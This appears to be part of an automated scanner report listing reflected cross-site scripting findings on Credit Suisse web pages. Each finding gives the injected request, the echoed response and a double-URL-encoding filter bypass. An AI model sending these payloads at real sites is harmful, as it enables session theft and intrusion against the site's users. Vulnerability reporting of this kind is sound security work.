GET /app/rss/index.cfm?fuseaction=OpenRSScbfe3"><script>alert(1)</script>809e200f8c1&aoid=318646&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:41:21 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:41:22 GMT
expires: Mon, 19 Sep 2011 15:41:22 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/rss/index.cfm?fuseaction=OpenRSScbfe3"><script>alert(1)</script>809e200f8c1&amp;aoid=318646&amp;lang=EN#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.25. https://infocus.credit-suisse.com/app/rss/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/rss/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22168"><script>alert(1)</script>05d4d19d782 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /app/rss/index.cfm?fuseaction=OpenRSS&aoid=319249&lang=EN&22168"><script>alert(1)</script>05d4d19d782=1 HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:51:35 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:51:35 GMT
expires: Mon, 19 Sep 2011 15:51:35 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/rss/index.cfm?fuseaction=OpenRSS&amp;aoid=319249&amp;lang=EN&amp;22168"><script>alert(1)</script>05d4d19d782=1#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.26. https://infocus.credit-suisse.com/app/rss/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/rss/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c10f"><script>alert(1)</script>a274091a61d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/rss/index.cfm?5c10f"><script>alert(1)</script>a274091a61d=1 HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:40:44 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:40:45 GMT
expires: Mon, 19 Sep 2011 15:40:45 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/rss/index.cfm?5c10f"><script>alert(1)</script>a274091a61d=1#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.27. https://infocus.credit-suisse.com/app/sendpage/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/sendpage/index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c367"><script>alert(1)</script>6007cd08af5 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /app/sendpage/index.cfm?fuseaction=OpenSendPage5c367"><script>alert(1)</script>6007cd08af5&aoid=319249&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:49:36 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:49:36 GMT
expires: Mon, 19 Sep 2011 15:49:36 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/sendpage/index.cfm?fuseaction=OpenSendPage5c367"><script>alert(1)</script>6007cd08af5&amp;aoid=319249&amp;lang=EN#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.28. https://infocus.credit-suisse.com/app/sendpage/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/sendpage/index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 375e4"><script>alert(1)</script>a1b81f01bbc was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/sendpage/index.cfm?fuseaction=OpenSendPage375e4"><script>alert(1)</script>a1b81f01bbc&aoid=318646&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:41:29 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:41:30 GMT
expires: Mon, 19 Sep 2011 15:41:30 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/sendpage/index.cfm?fuseaction=OpenSendPage375e4"><script>alert(1)</script>a1b81f01bbc&amp;aoid=318646&amp;lang=EN#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.29. https://infocus.credit-suisse.com/app/sendpage/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/sendpage/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 575cc"><script>alert(1)</script>4211395a729 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /app/sendpage/index.cfm?fuseaction=OpenSendPage&aoid=319249&lang=EN&575cc"><script>alert(1)</script>4211395a729=1 HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:51:29 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:51:29 GMT
expires: Mon, 19 Sep 2011 15:51:29 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/sendpage/index.cfm?fuseaction=OpenSendPage&amp;aoid=319249&amp;lang=EN&amp;575cc"><script>alert(1)</script>4211395a729=1#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.30. https://infocus.credit-suisse.com/app/sendpage/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/sendpage/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faac3"><script>alert(1)</script>a9375c4f797 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/sendpage/index.cfm?fuseaction=OpenSendPage&aoid=318646&lang=EN&faac3"><script>alert(1)</script>a9375c4f797=1 HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:42:53 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:42:53 GMT
expires: Mon, 19 Sep 2011 15:42:53 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/sendpage/index.cfm?fuseaction=OpenSendPage&amp;aoid=318646&amp;lang=EN&amp;faac3"><script>alert(1)</script>a9375c4f797=1#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.31. https://infocus.credit-suisse.com/app/shop/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/shop/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd3bc"><script>alert(1)</script>46157436cca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/shop/index.cfm?fd3bc"><script>alert(1)</script>46157436cca=1 HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:40:52 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
expires: {ts '2011-09-19 16:40:53'}
Content-Language: en-US
cache-control: public, no-cache, no-store, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/shop/index.cfm?fd3bc"><script>alert(1)</script>46157436cca=1#MID" title="Direttamente al contenuto" accesskey="1">
...[SNIP]...

1.32. https://infocus.credit-suisse.com/app/topic/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/topic/index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6514a"><script>alert(1)</script>9cddcf78b09 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/topic/index.cfm?fuseaction=OpenTopic6514a"><script>alert(1)</script>9cddcf78b09&coid=282917&lang=en HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:49:43 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:49:43 GMT
expires: Mon, 19 Sep 2011 15:49:43 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/topic/index.cfm?fuseaction=OpenTopic6514a"><script>alert(1)</script>9cddcf78b09&amp;coid=282917&amp;lang=en#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.33. https://infocus.credit-suisse.com/app/topic/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/topic/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63669"><script>alert(1)</script>5beb052b737 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/topic/index.cfm?fuseaction=OpenTopic&coid=282917&lang=en&63669"><script>alert(1)</script>5beb052b737=1 HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:51:24 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:51:24 GMT
expires: Mon, 19 Sep 2011 15:51:24 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/topic/index.cfm?fuseaction=OpenTopic&amp;coid=282917&amp;lang=en&amp;63669"><script>alert(1)</script>5beb052b737=1#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.34. https://infocus.credit-suisse.com/index.cfm [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /index.cfm

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d568e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e577c6b5369d was submitted in the page parameter. This input was echoed as d568e"><script>alert(1)</script>577c6b5369d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /index.cfm?fuseaction=setLang&lang=IT&page=%2Fapp%2Farticle%2Findex%2Ecfm?fuseaction%3DOpenArticle%26aoid%3D318646%26coid%3D118%26lang%3DEN%26bhjs%3D%2D1d568e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e577c6b5369d HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:42:44 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:42:45 GMT
expires: Mon, 19 Sep 2011 15:42:45 GMT
Content-Language: it-CH
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle&amp;aoid=318646&amp;coid=118&amp;bhjs=-1d568e"><script>alert(1)</script>577c6b5369d&amp;lang=IT#MID" title="Direttamente al contenuto" accesskey="1">
...[SNIP]...

1.35. https://responsibility.credit-suisse.com/app/_return/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/_return/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57d23"><script>alert(1)</script>240433024cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/_return/?57d23"><script>alert(1)</script>240433024cf=1 HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://responsibility.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:35:29 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:35:29 GMT
expires: Mon, 19 Sep 2011 15:35:29 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/_return/index.cfm?57d23"><script>alert(1)</script>240433024cf=1#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.36. https://responsibility.credit-suisse.com/app/article/index.cfm [bhjs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/article/index.cfm

Issue detail

The value of the bhjs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f68aa"><script>alert(1)</script>0b61086752f was submitted in the bhjs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/article/index.cfm?fuseaction=OpenArticle&aoid=319249&coid=64291&lang=EN&bhjs=-1f68aa"><script>alert(1)</script>0b61086752f HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://responsibility.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle&aoid=319249&coid=64291&lang=EN
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:07 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:38:08 GMT
expires: Mon, 19 Sep 2011 15:38:08 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle&amp;aoid=319249&amp;coid=64291&amp;lang=EN&amp;bhjs=-1f68aa"><script>alert(1)</script>0b61086752f#MID" title="Direttamente al contenuto" accesskey="1">
...[SNIP]...

1.37. https://responsibility.credit-suisse.com/app/article/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/article/index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a78d"><script>alert(1)</script>b74fa2d0829 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/article/index.cfm?fuseaction=OpenArticle1a78d"><script>alert(1)</script>b74fa2d0829&aoid=319249&coid=64291&lang=EN HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://www.credit-suisse.com/us/en/
Cookie: CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:35:46 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:35:47 GMT
expires: Mon, 19 Sep 2011 15:35:47 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle1a78d"><script>alert(1)</script>b74fa2d0829&amp;aoid=319249&amp;coid=64291&amp;lang=EN#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.38. https://responsibility.credit-suisse.com/app/article/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/article/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18696"><script>alert(1)</script>9b49975869d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/article/index.cfm?fuseaction=OpenArticle&aoid=319249&coid=64291&lang=EN&18696"><script>alert(1)</script>9b49975869d=1 HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://www.credit-suisse.com/us/en/
Cookie: CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:37:37 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=49fbeda0d495f678d8bcc101; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:37:38 GMT
expires: Mon, 19 Sep 2011 15:37:38 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<a href="https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle&amp;aoid=319249&amp;coid=64291&amp;lang=EN&amp;18696"><script>alert(1)</script>9b49975869d=1#MID" title="Direct to content" accesskey="1">
...[SNIP]...

1.39. https://responsibility.credit-suisse.com/app/error/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/error/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3d39"><script>alert(1)</script>1dcfbcc5044 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/error/?b3d39"><script>alert(1)</script>1dcfbcc5044=1 HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://responsibility.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:35:05 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
